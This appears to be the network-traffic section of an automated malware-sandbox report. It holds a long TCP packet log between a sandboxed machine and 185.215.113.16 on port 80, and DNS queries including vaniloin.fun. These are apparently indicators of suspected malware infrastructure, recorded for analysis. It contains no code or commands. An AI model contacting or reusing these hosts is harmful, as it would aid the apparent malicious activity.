Jul 26, 2024 17:57:05.288657904 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.288680077 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.288705111 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.289402008 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.289413929 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.289422989 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.289433956 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.289443970 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.289469957 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.289489031 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.290168047 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.290179968 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.290189028 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.290211916 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.290235996 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.290929079 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.290941000 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.290950060 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.290980101 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.291001081 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.291711092 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.291722059 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.291729927 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.291740894 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.291754007 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.291779041 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.292489052 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.292500019 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.292510033 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.292540073 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.292560101 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.293126106 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293137074 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293144941 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293154955 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293169975 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.293193102 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.293941975 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293953896 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293962002 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293972969 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293981075 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.293984890 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.293989897 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.294007063 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.294044018 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.294747114 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.294758081 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.294765949 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.294775963 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.294792891 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.294817924 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.295577049 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.295588970 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.295598030 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.295608044 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.295629025 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.295653105 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.296422958 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.296433926 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.296442032 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.296452045 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.296461105 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.296469927 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.296530962 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.296530962 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.297243118 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.297254086 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.297261953 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.297271967 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.297280073 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.297292948 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.297319889 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.298058987 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298070908 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298079014 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298086882 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298095942 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298095942 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.298119068 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.298144102 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.298892021 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298903942 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298913002 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298923016 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.298938990 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.298965931 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.299658060 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.299671888 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.299706936 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.318802118 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.318819046 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.318830013 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.318875074 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.318875074 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.319120884 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319134951 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319144011 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319154024 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319169998 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.319190025 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.319933891 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319946051 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319955111 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319966078 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319974899 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.319979906 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.319996119 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.320017099 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.320749044 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.320760012 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.320770025 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.320780039 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.320789099 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.320841074 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.320841074 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.320841074 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.321543932 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.321553946 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.321563005 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.321573019 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.321585894 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.321610928 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.322321892 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.322334051 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.322340965 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.322350979 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.322360039 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.322370052 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.322398901 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.322398901 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.323194981 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.323205948 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.323213100 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.323221922 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.323230982 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.323239088 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.323241949 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.323266983 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.323286057 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.323982954 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.323992968 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.324002028 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.324012041 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.324019909 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.324023008 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.324040890 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.324064970 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.363699913 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.363800049 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.363811970 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.363820076 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.363856077 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.363919973 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.364193916 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.364206076 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.364217043 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.364228964 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.364243031 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.364276886 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.374847889 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.374917984 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.374927998 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.374939919 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.374965906 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.374979019 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.375138044 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.375150919 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.375175953 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.375193119 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.375473022 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.375484943 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.375494957 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.375504971 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.375518084 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.375520945 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.375552893 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.376125097 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.376136065 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.376147032 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.376157999 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.376168966 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.376179934 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.376183033 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.376189947 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.376214981 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.377077103 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377089024 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377099037 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377110004 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377120972 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377127886 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.377149105 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.377171040 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.377671003 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377682924 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377692938 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377703905 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377713919 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377722025 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.377723932 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377734900 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.377743006 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.377763987 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.378633022 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.378643990 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.378654957 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.378665924 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.378675938 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.378678083 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.378686905 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.378696918 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.378696918 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.378709078 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.378741026 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.379621983 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.379636049 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.379645109 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.379656076 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.379667044 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.379678011 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.379679918 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.379700899 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.379708052 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.380585909 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.380598068 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.380606890 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.380618095 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.380629063 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.380639076 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.380641937 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.380650043 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.380655050 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.380671024 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.380696058 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.381555080 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381567001 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381577015 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381587029 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381597996 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381608009 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381613970 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.381617069 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381628036 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.381633997 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.381649971 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.381665945 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.382527113 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.382539034 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.382549047 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.382560015 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.382570028 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.382577896 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.382582903 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.382594109 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.382611036 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.382623911 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.383485079 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.383497000 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.383507013 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.383518934 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.383527994 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.383533001 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.383538961 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.383549929 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.383552074 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.383565903 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.383590937 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.384408951 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.384490013 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.408179045 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408238888 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.408318996 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408332109 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408354044 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.408380032 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.408531904 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408544064 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408554077 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408565044 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408576012 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.408576012 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.408605099 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.408617020 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.409162998 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.409176111 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.409187078 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.409197092 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.409204006 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.409209013 CEST	80	61179	185.215.113.16	192.168.2.5
Jul 26, 2024 17:57:05.409214973 CEST	61179	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:57:05.409245968 CEST	61179	80	192.168.2.5	185.215.113.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 17:57:15.828643084 CEST	192.168.2.5	1.1.1.1	0x52ef	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:15.832353115 CEST	192.168.2.5	1.1.1.1	0x8ee	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jul 26, 2024 17:57:19.492676020 CEST	192.168.2.5	1.1.1.1	0x6660	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.493098021 CEST	192.168.2.5	1.1.1.1	0xe960	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 17:57:19.493544102 CEST	192.168.2.5	1.1.1.1	0x2639	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.493990898 CEST	192.168.2.5	1.1.1.1	0x3919	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 17:57:19.614501953 CEST	192.168.2.5	1.1.1.1	0xee51	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:19.614901066 CEST	192.168.2.5	1.1.1.1	0x864	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 17:57:25.146727085 CEST	192.168.2.5	1.1.1.1	0x8462	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:25.170700073 CEST	192.168.2.5	1.1.1.1	0x321d	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 17:57:31.011087894 CEST	192.168.2.5	1.1.1.1	0xbc35	Standard query (0)	vaniloin.fun	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:47.047148943 CEST	192.168.2.5	1.1.1.1	0xb1de	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:47.047247887 CEST	192.168.2.5	1.1.1.1	0xccd6	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jul 26, 2024 17:57:47.418498039 CEST	192.168.2.5	1.1.1.1	0xad11	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:47.419123888 CEST	192.168.2.5	1.1.1.1	0x1e0e	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Jul 26, 2024 17:57:50.842422009 CEST	192.168.2.5	1.1.1.1	0x4e62	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:50.842667103 CEST	192.168.2.5	1.1.1.1	0x3566	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 17:57:50.843041897 CEST	192.168.2.5	1.1.1.1	0xd3ee	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 17:57:50.843378067 CEST	192.168.2.5	1.1.1.1	0x1a91	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 26, 2024 17:57:52.421926022 CEST	192.168.2.5	1.1.1.1	0x347a	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Jul 26, 2024 17:58:27.969373941 CEST	192.168.2.5	1.1.1.1	0xe6d6	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
